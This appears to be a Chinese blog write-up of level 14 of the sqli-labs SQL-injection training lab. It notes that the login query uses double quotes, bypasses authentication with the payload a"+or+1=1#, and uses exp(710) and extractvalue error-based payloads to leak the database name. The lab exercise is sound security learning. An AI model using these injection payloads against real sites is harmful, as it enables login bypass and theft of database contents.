sqllab第十四关通关笔记

知识点:

  • 错误注入
  • 这里的语法是 where username=""
  • 直接进行双引号绕过

通过admin admin登录发现还是没有任何回显

通过bp进行抓包;测试输入内容

构造payload:username=a'+or+1=1#

发现不能成功登录

尝试换成双引号

构造payload:username=a"+or+1=1#

成功登录了

尝试进行错误注入

构造payload:username=a"+or+exp(710)#

错误成功打印到页面上了

尝试利用错误注入获取数据库名

构造payload:username=a"+or+extractvalue(1,concat(0x7e,database(),0x7e))#

成功获取了数据库名

到这里就结束了,利用错误注入获取数据库中其他敏感信息在最开始的几关实验过了

10

相关推荐
kikikidult1 小时前
(2025.07)解决——ubuntu20.04系统开机黑屏,左上角光标闪烁
笔记·ubuntu
近津薪荼1 小时前
初学者关于数据在内存中的储存的笔记
笔记
碎叶城李白3 小时前
若依学习笔记1-validated
java·笔记·学习·validated
HuashuiMu花水木5 小时前
PyTorch笔记1----------Tensor(张量):基本概念、创建、属性、算数运算
人工智能·pytorch·笔记
笑衬人心。8 小时前
Ubuntu 22.04 修改默认 Python 版本为 Python3 笔记
笔记·python·ubuntu
金色光环8 小时前
【Modbus学习笔记】stm32实现Modbus
笔记·stm32·学习
zyxzyx6669 小时前
Flyway 介绍以及与 Spring Boot 集成指南
spring boot·笔记
西岭千秋雪_11 小时前
Redis性能优化
数据库·redis·笔记·学习·缓存·性能优化
HuashuiMu花水木11 小时前
Matplotlib笔记4----------图像处理
图像处理·笔记·matplotlib
DES 仿真实践家12 小时前
【Day 11-N22】Python类(3)——Python的继承性、多继承、方法重写
开发语言·笔记·python